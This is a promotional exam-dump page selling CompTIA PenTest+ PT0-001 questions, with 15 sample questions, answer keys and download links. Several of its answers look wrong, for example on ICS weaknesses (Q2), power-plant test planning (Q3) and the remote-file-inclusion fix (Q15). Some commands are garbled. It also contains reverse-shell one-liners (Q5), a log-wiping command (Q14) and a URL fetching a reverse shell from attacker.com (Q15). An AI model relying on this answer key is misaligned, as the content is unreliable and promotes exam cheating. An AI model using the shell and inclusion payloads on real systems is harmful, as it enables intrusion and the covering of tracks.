CompTIA PenTest+ dumps materialsCompTIA PenTest+ PT0-001PT0-001PT0-001 dumpsPT0-001 dumps pdfPT0-001 dumps VCEPT0-001 exam dumps

[Update Jan 2022] New PT0-001 dumps for CompTIA PenTest+ exam material

pt0-001 exam

New PT0-001 dumps contain 306 exam questions and answers and are the best material for preparing for the CompTIA PenTest+ certification exam.

Using PT0-001 dumps: https://www.lead4pass.com/pt0-001.html Select the latest updated PT0-001 dumps PDF, PT0-001 dumps VCE or “PDF + VCE”, Help candidates pass the CompTIA PenTest+ certification exam with ease.

Download Free Share PT0-001 Dumps PDF: https://drive.google.com/file/d/17oRfVK513UGl3-ScHnwjE59gSzpB3_Ch/

Read the latest free PT0-001 Dumps exam questions and answers online

Number of exam questionsExam nameFromRelease time
15CompTIA PenTest+ ExamLead4PassJan 12, 2022
New Question 1:

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

A. Lockpicking

B. Egress sensor triggering

C. Lock bumping

D. Lock bypass

 

Correct Answer: D

Reference: https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test-examples/


New Question 2:

 

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A. ICS vendors are slow to implement adequate security controls.

B. ICS staff are not adequately trained to perform basic duties.

C. There is a scarcity of replacement equipment for critical devices.

D. There is a lack of compliance for ICS facilities.

 

Correct Answer: B

 


New Question 3:

 

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A. Selection of the appropriate set of security testing tools

B. Current and load ratings of the ICS components

C. Potential operational and safety hazards

D. Electrical certification of hardware used in the test

 

Correct Answer: A

 


New Question 4:

 

Which of the following types of physical security attacks does a mantrap mitigate-?

A. Lock picking

B. Impersonation

C. Shoulder surfing

D. Tailgating

 

Correct Answer: D


New Question 5:

 

A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like us?

A. Perl -e ` use SOCKET\’; $i=\’; $p=\’443;

B. ssh [email protected] -p 443

C. NC -e /bin/sh 443

D. bash -i >and /dev/TCP// 443 0>and1

 

Correct Answer: D

Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd


New Question 6:

 

A penetration tester identifies the following findings during an external vulnerability scan:

new pt0-001 dumps questions 6

Which of the following attack strategies should be prioritized from the scan results above?

A. Obsolete software may contain exploitable components

B. Weak password management practices may be employed

C. Cryptographically weak protocols may be intercepted

D. Web server configurations may reveal sensitive information

 

Correct Answer: D

 


New Question 7:

 

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker\’s actual fingerprint without exploitation. Which of the following is the MOST likely of what happened?

A. The biometric device is tuned more toward false positives

B. The biometric device is configured more toward true negatives

C. The biometric device is set to fail closed

D. The biometric device duplicated a valid user\’s fingerprint.

 

Correct Answer: A


New Question 8:

 

A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

A. Use path modification to escape the application\’s framework.

B. Create a frame that overlays the application.

C. Inject a malicious iframe containing JavaScript.

D. Pass an iframe attribute that is malicious.

 

Correct Answer: C


New Question 9:

 

A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

A. Advanced persistent threat

B. Script kiddie

C. Hacktivist

D. Organized crime

 

Correct Answer: B

Reference https://www.sciencedirect.com/topics/computer-science/disgruntled-employee


New Question 10:

 

Which of the following is MOST important when planning for an engagement? (Select TWO).

A. Goals/objectives

B. Architectural diagrams

C. Tolerance to impact

D. Storage time for a report

E. Company policies

 

Correct Answer: AC


New Question 11:

 

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

A. Command injection attack

B. Clickjacking attack

C. Directory traversal attack

D. Remote file inclusion attack

 

Correct Answer: B

References: https://geekflare.com/http-header-implementation/


New Question 12:

 

A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For which of the following types of attack would this information be used?

A. Exploit chaining

B. Session hijacking

C. Dictionary

D. Karma

 

Correct Answer: C


New Question 13:

 

While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?

A. Levels of difficulty to exploit identified vulnerabilities

B. Time is taken to accomplish each step

C. Risk tolerance of the organization

D. Availability of patches and remediations

 

Correct Answer: C


New Question 14:

 

A penetration tester has successfully exploited an application vulnerability and wants to remove the command history from the Linux session. Which of the following will accomplish this successfully?

A. history –remove

B. cat history I clear

C. rm -f ./history

D. history -c

 

Correct Answer: D


New Question 15:

 

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

A. Implement a blacklist.

B. Block URL redirections.

C. Double URL encodes the parameters.

D. Stop external calls from the application.

 

Correct Answer: B


 

Lead4Pass PT0-001 dumps have been updated to the latest version. It has been verified by the actual test room and is real and effective. It is the best exam material for the CompTIA PenTest+ certification exam. Download PT0-001 dumps with PDF and VCE: https://www.lead4pass.com/pt0-001.html (306Q&As), Help candidates pass 100% of CompTIA PenTest+ certification exams.

BTW, share part of PT0-001 Dumps PDF online download for free:

https://drive.google.com/file/d/17oRfVK513UGl3-ScHnwjE59gSzpB3_Ch/